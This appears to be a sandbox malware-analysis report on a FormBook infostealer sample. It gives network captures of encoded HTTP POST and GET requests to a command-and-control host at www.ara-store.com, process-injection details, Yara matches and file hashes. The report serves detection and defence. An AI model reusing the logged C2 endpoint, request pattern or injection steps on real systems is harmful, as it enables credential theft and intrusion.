Oct 7, 2024 11:54:34.405489922 CEST	1289	IN	Data Raw: 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 34 66 39 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 77 72 61 Data Ascii: px;padding:0;background-color:#f2f4f9}html:not(.is_adaptive) .b-page__addition-wrapper{min-width:996px}@media (min-width:1024px){.is_adaptive .b-page__addition-wrapper{min-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inte
Oct 7, 2024 11:54:34.405961990 CEST	1289	IN	Data Raw: 66 6c 6f 77 5f 76 69 73 69 62 6c 65 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 40 6d 65 64 Data Ascii: flow_visible,html:not(.is_adaptive) .b-page_overflow_visible{overflow:visible}@media (min-width:1024px){.is_adaptive .b-page_overflow_visible{overflow:visible}}/!******************************************************************************
Oct 7, 2024 11:54:34.406018019 CEST	1289	IN	Data Raw: 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 2d 63 6f 6d 70 61 63 74 2e Data Ascii: a Neue,Helvetica,FreeSans,sans-serif;margin-bottom:60px}.b-text_size_huge-compact.b-text_margin_top,.b-text_size_huge.b-text_margin_top{margin-top:60px}.b-text_size_huge-compact{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans
Oct 7, 2024 11:54:34.406187057 CEST	1289	IN	Data Raw: 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6e 6f 72 6d Data Ascii: ,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:24px}.b-text_size_normal-compact.b-text_margin_top,.b-text_size_normal.b-text_margin_top{margin-top:24px}.b-text_size_normal-compact{font:15px/18px Inter,Arial,Helvetica Neue,Helvetic
Oct 7, 2024 11:54:34.406306982 CEST	1289	IN	Data Raw: 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 68 75 67 65 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 Data Ascii: op.b-text_margin_top,html:not(.is_adaptive) .b-text_size_huge\@desktop.b-text_margin_top{margin-top:60px}html:not(.is_adaptive) .b-text_size_huge-compact\@desktop{font:48px/54px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-b
Oct 7, 2024 11:54:34.406646013 CEST	1289	IN	Data Raw: 6f 6d 3a 33 30 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 5c 40 64 65 73 6b 74 6f 70 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f Data Ascii: om:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_medium\@desktop.b-text_margin_top{margin-top:30px}html:not(.is_adaptive) .b-text_size_medium-compact\@desktop{font:20px/2
Oct 7, 2024 11:54:34.406774998 CEST	1289	IN	Data Raw: 72 67 69 6e 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70 Data Ascii: rgin:0}@media (min-width:1024px){.is_adaptive .b-text_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}.is_adaptive .b-text_size_giant-compact\@desktop.b-text_margin_top,.is_adaptiv
Oct 7, 2024 11:54:34.616030931 CEST	1289	IN	Data Raw: 6c 61 72 67 65 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 32 34 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 Data Ascii: large\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}.is_adaptive .b-text_size_large-compact\@desktop.b-text_margin_top,.is_adaptive .b-text_size_large\@desktop.b-text_margin_top{margin-top:

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.11.30	49818	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:40.570455074 CEST	659	OUT	POST /vbsv/ HTTP/1.1 Host: www.ara-store.com Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.ara-store.com Referer: http://www.ara-store.com/vbsv/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 57 47 64 4e 74 50 52 52 71 4d 6e 66 62 6f 6b 43 68 52 54 38 70 49 54 39 51 72 54 68 57 54 59 67 7a 6e 35 6c 6d 33 66 37 72 46 38 79 78 67 68 2b 68 63 71 36 35 5a 4c 35 36 70 66 72 70 78 64 6d 78 31 7a 4a 4b 45 7a 53 4e 39 48 6c 75 6c 77 6c 4c 70 67 6f 66 45 4b 6f 33 5a 43 2f 54 61 36 2f 70 78 43 48 70 56 43 73 70 34 72 7a 78 45 78 73 54 71 70 30 77 61 46 6c 63 78 46 61 6b 71 64 48 42 73 6c 67 4e 38 53 67 31 71 71 47 4a 67 61 49 76 4d 6c 66 6d 49 31 4a 75 31 72 35 39 7a 73 44 6d 6b 54 7a 6c 36 4b 67 46 2f 6e 39 2b 35 51 4f 6a 30 2b 68 57 4d 30 55 61 51 6a 55 6c 45 33 32 34 41 3d 3d Data Ascii: VzK4o8Jx=WGdNtPRRqMnfbokChRT8pIT9QrThWTYgzn5lm3f7rF8yxgh+hcq65ZL56pfrpxdmx1zJKEzSN9HlulwlLpgofEKo3ZC/Ta6/pxCHpVCsp4rzxExsTqp0waFlcxFakqdHBslgN8Sg1qqGJgaIvMlfmI1Ju1r59zsDmkTzl6KgF/n9+5QOj0+hWM0UaQjUlE324A==

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.11.30	49819	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:43.209887981 CEST	679	OUT	POST /vbsv/ HTTP/1.1 Host: www.ara-store.com Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.ara-store.com Referer: http://www.ara-store.com/vbsv/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 57 47 64 4e 74 50 52 52 71 4d 6e 66 55 6f 30 43 6d 77 54 38 68 49 54 2b 66 4c 54 68 4d 6a 59 6b 7a 6e 31 6c 6d 32 4c 53 71 32 59 79 78 42 52 2b 67 64 71 36 36 5a 4c 35 78 4a 66 75 6e 52 64 58 78 31 2b 38 4b 42 4c 53 4e 38 6a 6c 75 67 55 6c 4c 59 67 72 66 55 4b 71 38 35 43 78 64 36 36 2f 70 78 43 48 70 56 57 4b 70 34 54 7a 78 58 70 73 53 50 4a 31 39 36 46 69 4b 68 46 61 79 71 64 44 42 73 6c 43 4e 34 54 48 31 70 43 47 4a 67 4b 49 76 59 78 41 76 49 31 50 78 6c 71 39 7a 47 31 4b 75 57 66 33 30 71 6d 4e 4a 75 37 47 79 4f 68 55 2b 33 4b 6a 46 73 49 35 47 52 4f 38 6e 47 32 74 6c 42 64 6b 74 4e 4b 52 70 64 70 68 6d 79 79 77 75 71 68 41 79 54 55 3d Data Ascii: VzK4o8Jx=WGdNtPRRqMnfUo0CmwT8hIT+fLThMjYkzn1lm2LSq2YyxBR+gdq66ZL5xJfunRdXx1+8KBLSN8jlugUlLYgrfUKq85Cxd66/pxCHpVWKp4TzxXpsSPJ196FiKhFayqdDBslCN4TH1pCGJgKIvYxAvI1Pxlq9zG1KuWf30qmNJu7GyOhU+3KjFsI5GRO8nG2tlBdktNKRpdphmyywuqhAyTU=

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.11.30	49820	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:45.850275993 CEST	1289	OUT	POST /vbsv/ HTTP/1.1 Host: www.ara-store.com Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.ara-store.com Referer: http://www.ara-store.com/vbsv/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 57 47 64 4e 74 50 52 52 71 4d 6e 66 55 6f 30 43 6d 77 54 38 68 49 54 2b 66 4c 54 68 4d 6a 59 6b 7a 6e 31 6c 6d 32 4c 53 71 32 51 79 77 79 5a 2b 68 2b 43 36 37 5a 4c 35 2b 5a 66 76 6e 52 64 77 78 78 53 77 4b 42 50 43 4e 2f 4c 6c 6f 32 59 6c 63 62 34 72 51 55 4b 71 7a 5a 43 77 54 61 37 39 70 78 53 44 70 56 47 4b 70 34 54 7a 78 52 46 73 55 61 70 31 2f 36 46 6c 63 78 45 49 6b 71 64 37 42 74 4e 7a 4e 34 66 39 31 71 69 47 4a 57 57 49 76 74 6c 41 76 49 31 50 70 31 71 47 7a 47 78 4c 75 56 76 6a 30 72 76 34 49 66 66 47 69 34 68 4c 6d 6a 4f 44 59 76 49 68 4d 54 61 42 75 56 32 49 69 6d 46 35 6a 62 58 75 75 73 52 42 2b 46 69 58 35 62 42 45 6d 57 74 72 6c 2b 5a 6c 69 6d 6d 41 50 4d 63 30 71 32 51 79 7a 4f 37 6e 2f 67 79 6f 65 57 6b 64 65 67 47 71 7a 42 75 5a 6b 34 4a 50 64 34 63 45 4b 59 68 58 49 65 54 38 4b 78 61 31 2b 37 35 57 35 37 31 38 69 72 4e 30 48 43 75 75 32 63 55 35 42 6a 4b 41 75 75 4a 34 33 74 47 6d 39 76 45 79 70 68 72 6a 75 69 50 75 2f 45 72 46 39 4f 73 79 70 73 59 59 61 [TRUNCATED] Data Ascii: VzK4o8Jx=WGdNtPRRqMnfUo0CmwT8hIT+fLThMjYkzn1lm2LSq2QywyZ+h+C67ZL5+ZfvnRdwxxSwKBPCN/Llo2Ylcb4rQUKqzZCwTa79pxSDpVGKp4TzxRFsUap1/6FlcxEIkqd7BtNzN4f91qiGJWWIvtlAvI1Pp1qGzGxLuVvj0rv4IffGi4hLmjODYvIhMTaBuV2IimF5jbXuusRB+FiX5bBEmWtrl+ZlimmAPMc0q2QyzO7n/gyoeWkdegGqzBuZk4JPd4cEKYhXIeT8Kxa1+75W5718irN0HCuu2cU5BjKAuuJ43tGm9vEyphrjuiPu/ErF9OsypsYYaWwHRazHeJ/uHdoGOxSBnv0SMHFwkTdpsZk3BL16dYV/8FqWACYK+QogV4nLRRtL+c2vnllbFzAGWt7kKVe6Gc0gFdBBLOf9Nqo5rSmE2vmK2xJIB/magaquJOYTI02mCzrKI01sR6Iq/fCtFX9IE9HN8FURjySXVA1vqg9tDZ8chb9xCHF4upieoXM1qx6lESwc1K4T2uwyNCvgsdcxnvzbzzM61fxNaDbqf6dE5sNvndf3yk4aOmYPw+JJXzey1YRpoZZPfu2bmAN8sWgqIE8ZI1kqE/0OOYwp8im6XNtoDyWe2CbU0LyiyVk4KCBOce/JVwOGvKzPIfdhSAzDtwzb9PPr7IuqIOf8NnjtEIjfpcC7HaLZD8cLLhgjWNs0EIG4g9GPLtcyDaqjPLo6mqPIvJ4U819nbtmxVUTmditJGenx6FctM0BWcDhr5qnf2fIptmAdAFcXWoReKXfhafkJfCYjC48+yZHq/eVTd6SYov5JN
Oct 7, 2024 11:54:45.850332975 CEST	2507	OUT	Data Raw: 6c 61 57 2b 37 52 79 4a 78 6e 58 4d 32 64 42 67 47 35 5a 56 41 49 7a 4f 38 37 64 59 31 73 67 77 64 55 38 4d 62 6f 57 44 35 4e 30 58 56 7a 44 6d 31 54 50 4d 67 6f 7a 37 78 42 63 59 51 6b 39 55 39 6a 72 72 65 55 37 31 36 4f 58 6d 37 62 49 61 57 77 Data Ascii: laW+7RyJxnXM2dBgG5ZVAIzO87dY1sgwdU8MboWD5N0XVzDm1TPMgoz7xBcYQk9U9jrreU716OXm7bIaWw+/YQvPwZqNvAVBNLub6eiSPKwiOG1sEQadoScNSHrB2a8ntp4icqYoyW4I4cQTp7+VrzbcxsXGri4h7y634mz5aGlEZu4nHKSCp+L4eIvihOa4iM6LqjnzXM2kP75AHLFIP3rIRLVs0j2vwHCdIyM0qbGw2jKycfy

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.11.30	49821	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:54:48.488708019 CEST	390	OUT	GET /vbsv/?VzK4o8Jx=bE1tu4Njqer8fYE3ogT5h7aBRb2mTTstgFdh6ULQtUw7pAI4rpm78pT6sJrtnBlXzUrAExT6FvXu50MEINd+YE6s/Zqjf6ffoiebp1emg4fruBFCNZ4S/qE=&0zu8A=o2yln6 HTTP/1.1 Host: www.ara-store.com Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:54:48.590940952 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 07 Oct 2024 09:54:48 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 7a 4b 34 6f 38 4a 78 3d 62 45 31 74 75 34 4e 6a 71 65 72 38 66 59 45 33 6f 67 54 35 68 37 61 42 52 62 32 6d 54 54 73 74 67 46 64 68 36 55 4c 51 74 55 77 37 70 41 49 34 72 70 6d 37 38 70 54 36 73 4a 72 74 6e 42 6c 58 7a 55 72 41 45 78 54 36 46 76 58 75 35 30 4d 45 49 4e 64 2b 59 45 36 73 2f 5a 71 6a 66 36 66 66 6f 69 65 62 70 31 65 6d 67 34 66 72 75 42 46 43 4e 5a 34 53 2f 71 45 3d 26 30 7a 75 38 41 3d 6f 32 79 6c 6e 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VzK4o8Jx=bE1tu4Njqer8fYE3ogT5h7aBRb2mTTstgFdh6ULQtUw7pAI4rpm78pT6sJrtnBlXzUrAExT6FvXu50MEINd+YE6s/Zqjf6ffoiebp1emg4fruBFCNZ4S/qE=&0zu8A=o2yln6"}</script></head></html>

Target ID:	1
Start time:	05:50:24
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\SOA SIL TL382920.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SOA SIL TL382920.exe"
Imagebase:	0xb30000
File size:	698'368 bytes
MD5 hash:	CAEC46AAACE8E50A9763DFFC6C4ACF0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:50:25
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\SOA SIL TL382920.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SOA SIL TL382920.exe"
Imagebase:	0xcd0000
File size:	698'368 bytes
MD5 hash:	CAEC46AAACE8E50A9763DFFC6C4ACF0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:50:48
Start date:	07/10/2024
Path:	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Imagebase:	0x140000000
File size:	16'696'840 bytes
MD5 hash:	731FB4B2E5AFBCADAABB80D642E056AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	05:50:49
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\replace.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\replace.exe"
Imagebase:	0x4c0000
File size:	18'944 bytes
MD5 hash:	82B9440BF8D788460BE2FDD73C324659
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:51:01
Start date:	07/10/2024
Path:	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe"
Imagebase:	0x3e0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:51:14
Start date:	07/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff71b2d0000
File size:	675'744 bytes
MD5 hash:	7B12552FD2A5948256B20EC97B708F94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 015704C0 Relevance: 3.7, Strings: 2, Instructions: 1163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$0q, xrefs: 01571191
90, xrefs: 0157187E

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: 90$$0q
API String ID: 0-2268665189
Opcode ID: a5a6ab9a1b3ddf6c5aa32013b99a02364f360138ba5dc69201b65627b15df556
Instruction ID: 8553f86a201a46259e88cf03edc006b8c8fa6d3b43a03458995a5d3e2314bb2c
Opcode Fuzzy Hash: a5a6ab9a1b3ddf6c5aa32013b99a02364f360138ba5dc69201b65627b15df556
Instruction Fuzzy Hash: E6C2D134A01619CFDB24DF64C995AD9B7B2FF8A304F1581E9E509AB361DB31AE81CF40

Function 01571111 Relevance: 3.5, Strings: 2, Instructions: 1001
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$0q, xrefs: 01571191
90, xrefs: 0157187E

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID: 90$$0q
API String ID: 0-2268665189
Opcode ID: 0f7d3662bec61987daa1917bcde20b21f96ec3d60c5396bc4fad5669fa27bc3a
Instruction ID: 401e129ffd513350be017ae906038a014d67c23853575ea3b777a15e5dd3f436
Opcode Fuzzy Hash: 0f7d3662bec61987daa1917bcde20b21f96ec3d60c5396bc4fad5669fa27bc3a
Instruction Fuzzy Hash: 48B2D134A00219CFDB25DF64C995ED9B7B2BF8A305F1181E9E509AB361DB31AE85CF40

Function 01575AF0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf10abb881fcc636179045c8f21cd3c1f82861996b737eeaaedff96d787c0eca
Instruction ID: d63efb4976444dab4c8ae78c669d241174853368f1772fb293289dd2b40706db
Opcode Fuzzy Hash: cf10abb881fcc636179045c8f21cd3c1f82861996b737eeaaedff96d787c0eca
Instruction Fuzzy Hash: 57A1CE70A243848FD7548B69E8516BEBBF5FF82310F11856FE4559F292E2348941CB62

Function 01578B79 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0423a97f51a30b715bd39578fb554c0d00a0c4523254e4c10fe3af15152f16e0
Instruction ID: ddf64bf48b8f68ac45ed854323765163060734de7c3761af92f73df7a37cfed3
Opcode Fuzzy Hash: 0423a97f51a30b715bd39578fb554c0d00a0c4523254e4c10fe3af15152f16e0
Instruction Fuzzy Hash: 384128B4D09208CFDB08CFAAD4496EEBBFABF8D310F14D46AD919AB251DB344941CB14

Function 0157F28D Relevance: 1.8, APIs: 1, Instructions: 324
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0157F55F

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5651b04339c287b708c2b7b9a89c76436df0db5cab2b8ca7769804f1b76c158a
Instruction ID: ebc599076a8ef10dda00f6383b5b7cd60c70a1688e387d7ff95484ac528ca825
Opcode Fuzzy Hash: 5651b04339c287b708c2b7b9a89c76436df0db5cab2b8ca7769804f1b76c158a
Instruction Fuzzy Hash: 96C13971D002698FEF24CFA8D841BEDBBB1BF49304F0091AAD959B7250DB749A85CF91

Function 0157F298 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0157F55F

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: da05072f63979432395f23a4bc2c96c4ff8d5ca0665c13b5a2fb6f72ccc14442
Instruction ID: 0e8f12de29fc5cf0cbb3ec07d2e1bc481324349b6c7dea168a265a76f2056c1f
Opcode Fuzzy Hash: da05072f63979432395f23a4bc2c96c4ff8d5ca0665c13b5a2fb6f72ccc14442
Instruction Fuzzy Hash: 3FC12971D002698FEF24CFA8D841BEDBBB1BF49304F0091AAD959B7250DB749A85CF91

Function 0157EEF9 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157EFD3

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3be94735969c6cf48a08e46307f88970681b19ae2000fae19478b44eb04da4f3
Instruction ID: 4098fe9763d37c0384a001c94cb575f43620f7d9dddcfe2ea222d0dc6ab310a9
Opcode Fuzzy Hash: 3be94735969c6cf48a08e46307f88970681b19ae2000fae19478b44eb04da4f3
Instruction Fuzzy Hash: 2141BBB5D012589FDF00CFA9D984ADEFBF1BB49314F10942AE814BB210D735AA45CF64

Function 0157EF00 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157EFD3

Memory Dump Source

Source File: 00000001.00000002.20976779466.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1570000_SOA SIL TL382920.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bb2f8336e3c539c30a5b3a8a85984b2c9570058dc58cbd620ee8b48314db643a
Instruction ID: 8777ac7cdd1f17bab4a59f9b04b721c8e72e94c009253b289c7ddf5451191b03
Opcode Fuzzy Hash: bb2f8336e3c539c30a5b3a8a85984b2c9570058dc58cbd620ee8b48314db643a
Instruction Fuzzy Hash: 0641ABB4D012589FDF00CFA9D984AEEFBF1BB49314F10942AE818BB210D775AA45CF64

